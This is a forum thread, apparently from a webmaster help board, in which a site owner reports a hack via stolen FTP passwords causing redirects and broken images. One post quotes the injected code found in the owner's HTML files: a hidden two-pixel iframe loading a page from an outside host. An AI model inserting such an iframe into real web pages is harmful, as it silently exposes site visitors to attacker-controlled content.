I have two sites, check this one
- when you click on links you will be redirected to another (above mentioned) website. if you click "show image" you will also be redirected tio another website, I talked with my hoster they said someone had my FTP pw's
ok, I have replaced all files on darkshine.de but still not a big change!
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changed the link
--------------- Added [DATE]1357139926[/DATE] at [TIME]1357139926[/TIME] ---------------
Originally Posted by doctorsexy
Watch that link. as it trys to load something..
changed the link
--------------- Added [DATE]1357140311[/DATE] at [TIME]1357140311[/TIME] ---------------
They added to all my .html files this:
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo . com/hzws.html>;</iframe>
Have deleted all the files and replaced with new files - not helped!
Searched for
%base64% %iframe%
in phpmyadmin
nothing suspicious found.
--------------- Added [DATE]1357140482[/DATE] at [TIME]1357140482[/TIME] ---------------
All the pictures from my server are not showing up neither on my sites nor on other places I have posted them!
Only if I click on "copy address for image" and paste in url bar I can see them.